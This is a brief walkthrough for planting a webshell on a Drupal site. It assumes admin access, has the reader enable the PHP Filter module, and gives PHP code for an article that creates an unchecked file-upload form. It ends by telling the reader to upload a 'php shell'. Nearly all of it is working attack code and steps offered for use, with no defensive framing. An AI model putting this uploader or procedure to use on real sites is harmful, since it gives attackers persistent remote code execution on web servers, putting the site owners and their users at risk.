- login drupal with admin username and password.
- enable PHP Filter
- Add content with PHP Code
<?php
if(isset($_POST['Submit']))
{
$filedir = "";
$maxfile = '2000000';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);
echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; }?>
Enable PHP Filter (Modules Settings), and save it.
Add a new article with PHP Code format, and POST it.
Go to Drupal home page, and you can find upload page.
Upload your php shell.